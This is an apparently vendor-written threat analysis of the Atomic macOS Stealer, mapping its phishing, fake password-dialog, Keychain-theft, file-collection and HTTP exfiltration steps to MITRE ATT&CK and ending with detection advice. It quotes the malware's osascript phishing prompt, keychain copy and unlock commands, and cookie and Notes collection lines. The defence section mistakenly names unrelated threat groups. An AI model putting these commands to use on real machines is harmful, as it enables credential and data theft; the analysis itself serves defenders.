.svg)
.svg)
The Atomic macOS Stealer (AMOS) is a malicious software designed to exfiltrate sensitive information from macOS systems. It collects data such as Keychain passwords, system information, files from the desktop and documents folders, and macOS user passwords. The malware also targets browser data, including cookies and login credentials, and cryptocurrency wallets like Electrum, Binance, Exodus, Atomic, and Coinomi.
In this blog, we will explore the tactics, techniques, and procedures (TTPs) employed by Atomic Stealer and examine how its operations map to MITRE ATT&CK framework tactics. This analysis provides deeper insight into how AMOS functions and how defenders can better detect and mitigate its impact.
Analyzing Atomic Stealer's Advanced Tactics, Techniques, and Procedures (TTPs)
Gaining notoriety in 2024, Atomic Stealer (AMOS) rapidly established itself as one of the most dangerous info-stealing malware families targeting macOS users. It is typically distributed through deceptive means such as fake advertisements and spoofed applications like Arc Browser. Once executed, it tricks victims into bypassing macOS security prompts and proceeds to extract sensitive data—including credentials, cookies, notes, and cryptocurrency wallet files. With advanced features like AppleScript-based password harvesting and XOR-obfuscated payloads, AMOS exemplifies the growing sophistication of macOS-targeted malware.
This section provides a comprehensive analysis of these TTPs, offering insights into how Atomic Stealer, including the malware infection kill chain and the tools they employ.
Initial Access Methods (TA0001)
T1566.002 - Phishing: Spearphishing Link
Fake Application Installers: Attackers create counterfeit versions of popular applications such as Tor Browser, Photoshop CC, and Microsoft Office [1]. Unsuspecting users download these malicious installers, typically packaged as disk image (.dmg) files, which execute the malware instead of the legitimate software.
Malvertising via Google Ads: Cybercriminals exploit Google's advertising platform to display deceptive ads that redirect users to fraudulent websites hosting Atomic Stealer [1]. For instance, users searching for software like "Arc Browser" may encounter malicious ads leading to spoofed sites (e.g., aricl[.]net) that prompt the download of a malicious DMG installer.
Terminal Command Execution (ClickFix Technique): Users are deceived into executing commands via the Terminal application [2]. For example, a fake installer may instruct users to open Terminal and drag-and-drop a file to install an app, which actually executes the malicious payload.
Figure 1. Fake DeepSeek Website Luring Victims to Drag-and-Drop Installation
Execution (TA0002)
T1204.002 - User Execution: Malicious File
Above, I emphasized that users searching for legitimate software, such as Arc Browser, might encounter deceptive ads that direct them to counterfeit websites. These websites prompt users to download malicious disk image files. (example: "App_v1.0.4.dmg").
Upon opening these files, users are instructed to bypass macOS Gatekeeper—a security feature intended to block untrusted software—by right-clicking the application and selecting "Open." This action permits the execution of unsigned or ad-hoc signed applications, circumventing Apple's security measures.
T1059.002 – Command and Scripting Interpreter: AppleScript
The AppleScript method involves the malware displaying deceptive dialog boxes to users, requesting their system passwords under the guise of legitimate system prompts.
For instance, Atomic Stealer may present a dialog box with the message:
Here, you can see the whole script here.
Atomic Stealer employs AppleScript commands executed via osascript to create these fake dialog boxes. The use of the "hidden answer" parameter ensures that the password input is masked, mimicking standard password entry fields and enhancing the deception.
|
osascript -e 'display dialog "The launcher needs permissions to enable background auto-updates.\n\nPlease enter your password." with title "Auto-Updates System" default answer "" with icon caution buttons {"Continue"} default button "Continue" with hidden answer' |
Hence, this prompt is designed to appear as a legitimate system request, thereby increasing the likelihood that users will enter their passwords. Once the password is obtained, the malware can use it to escalate privileges or move laterally within the system.
Defense Evasion (TA0005)
Obfuscated Files or Information (T1027)
The new variant of Atomic Stealer employs heavy obfuscation through XOR encoding with a static key (0x91). A function named bewta() is responsible for de-xoring various bytes at runtime, dynamically decoding strings and payloads [3].
This runtime decoding significantly complicates static analysis by concealing critical components such as AppleScript payloads and hardcoded asset targets. XOR encoding is a widely used obfuscation tactic in malware development, allowing threats like Atomic Stealer to bypass signature-based detection mechanisms employed by antivirus (AV) and endpoint detection and response (EDR) solutions.
Credential Access (TA0006)
T1555.001 - Credentials from Password Stores: Keychain
As stressed earlier in the Command and Scripting section, Atomic Stealer prompts for and captures the user’s password, then accesses the macOS Keychain.
|
osascript -e 'display dialog "The launcher needs permissions to enable background auto-updates. |
Then, Atomic Stealer copies the Keychain database to a new directory:
|
cp ~/Library/Keychains ~/Documents/data/Keychain/kc.db |
Then, it unlocks the keychain and uses the bundled open-source tool Chainbreaker to extract credentials. This allows exfiltration of login data stored in the keychain.
|
security unlock-keychain -p <password> /Users/<user>/Library/Keychains/login.keychain-db |
Discovery (TA0007)
Atomic Stealer (AMOS) performs system reconnaissance by executing various commands to gather detailed information about the victim’s device. Commonly used commands include uname, sw_vers, ioreg, as well as:
- system_profiler SPHardwareDataType
- system_profiler SPDisplaysDataType
The collected information is typically stored in files like Sysinfo.txt and is leveraged for command-and-control (C2) communication. This data also enables attackers to tailor their tactics, techniques, and procedures (TTPs) to the target system's specific configuration, optimizing the impact of the subsequent stages of the attack.
Collection (TA0009)
T1005 – Data from Local System
Atomic Stealer employs AppleScript commands to duplicate specific files and gather sensitive information from the infected macOS system.
It targets Safari cookies by copying the Cookies.binarycookies file and extracts Notes data by duplicating files like NoteStore.sqlite, NoteStore.sqlite-shm, and NoteStore.sqlite-wal [4].
Additionally, Atomic Stealer iterates through files in the Desktop and Documents directories, selecting those with particular extensions and sizes, and duplicates them to a designated folder for exfiltration.
-
Steals Safari Cookies
|
duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing |
-
Notes Data
|
duplicate file "NoteStore.sqlite" ... |
-
Document Collection Loop
|
repeat with aFile in (desktopFiles & documentsFiles) |
Exfiltration (TA0010)
Exfiltration Over C2 Channel (T1041)
In previous sections, we stressed that Atomic Stealer is designed to collect data such as Keychain passwords, system information, files from the desktop and documents folders, and macOS user passwords.
AMOS typically exfiltrates this data by compressing it into a ZIP archive and transmitting it over an existing command-and-control (C2) channel. The exfiltration process involves sending the ZIP file via HTTP POST requests to a C2 server.
For instance, a decrypted string from AMOS indicates the use of the following HTTP request [5]:
|
POST /joinsystem HTTP/1.1 |
Exfil includes:
-
Cookies.binarycookies
-
NoteStore.sqlite & friends
-
Wallets (e.g., Exodus/passphrase.json)
-
Keychain file
-
Sysinfo.txt
-
Password prompt log
How Does Picus Help Against the Atomic Stealer?
We strongly suggest simulating ransomware groups to test the effectiveness of your security controls against their attacks using the Picus Security Validation Platform.
Picus Threat Library includes the following threats for the Atomic Stealer.
|
Threat ID |
Threat Name |
Attack Module |
|
29912 |
Atomic macOS Stealer Malware Campaign |
macOS Endpoint |
|
79314 |
Atomic Infostealer Download Threat |
Network Infiltration |
|
97401 |
Atomic Infostealer Email Threat |
E-mail Infiltration |
Defense Strategies Against the Billbug Threat Group's Attacks
To mitigate the impact of Lotus Blossom attack campaigns, organizations should adopt a layered defense approach:
Deploy Advanced EDR with AppleScript and Keychain Monitoring
Atomic Stealer’s reliance on AppleScript and keychain manipulation requires macOS-specific behavioral monitoring. Deploy an EDR solution that can track osascript activity, detect prompts requesting hidden password fields, and flag access to sensitive files like Cookies.binarycookies and NoteStore.sqlite. Behavior-based rules for detecting rapid access to multiple personal directories or suspicious use of security unlock-keychain are essential.
Continuously Test and Validate Security Controls
Atomic Stealer follows a clear sequence of behaviors—initial access through spoofed installers, AppleScript-based prompting, file collection, and exfiltration. Implementing Breach and Attack Simulation (BAS) platforms, such as Picus Security Control Validation (SCV), enables security teams to emulate realistic, multi-stage attack scenarios that mirror the tactics, techniques, and procedures (TTPs) observed in Atomic Stealer campaigns.
By continuously testing your environment against these scenarios, BAS tools can expose blind spots, validate existing controls, and generate actionable insights to improve detection and response capabilities—helping you stay one step ahead of sophisticated adversaries.
Monitor Network for Plain HTTP POSTs with Encoded Archives
Atomic Stealer uses HTTP POST requests (not HTTPS) to exfiltrate base64-encoded zip archives. Implement network monitoring tools that alert on suspicious unencrypted uploads to unknown IPs or unusual POST activity with large payloads and encoded parameters. Consider blocking known IOCs like 193.233.132.188 and 46.101.104.172 at the network level.
Establish and Test Incident Response Procedures
Create an incident response (IR) playbook tailored to macOS threats. Include steps for quarantining systems running unsigned AppleScript payloads or showing signs of unauthorized keychain access. Regularly conduct tabletop exercises simulating an Atomic Stealer infection—from initial breach to credential theft and exfiltration—to ensure readiness.
References
[1] H. Montini, “Atomic Stealer: A Dangerous Threat to Mac Users,” Proven Data, Oct. 16, 2024. Available: https://www.provendata.com/blog/what-is-atomic-stealer-amos/. [Accessed: Apr. 01, 2025]
[2] “Fake DeepSeek Site Infects Mac Users with Atomic (AMOS) Stealer,” eSentire, Feb. 20, 2025. Available: https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer. [Accessed: Apr. 01, 2025]
[3] P. Paganini, “Info stealer attacks target macOS users,” Security Affairs, Apr. 01, 2024. Available: https://securityaffairs.com/161287/malware/info-stealer-malware-macos.html. [Accessed: Apr. 02, 2025]
[4] Cyble, “Atomic Stealer Strikes & Dead Cookies Restoration Rise,” Cyble, Jan. 25, 2024. Available: https://cyble.com/blog/uncovering-atomic-stealer-amos-strikes-and-the-rise-of-dead-cookies-restoration/. [Accessed: Apr. 02, 2025]
[5] J. T. Labs, “Jamf Threat Labs dissects infostealer malware.” Available: https://www.jamf.com/blog/infostealers-pose-threat-to-macos/. [Accessed: Apr. 02, 2025]
Share this:
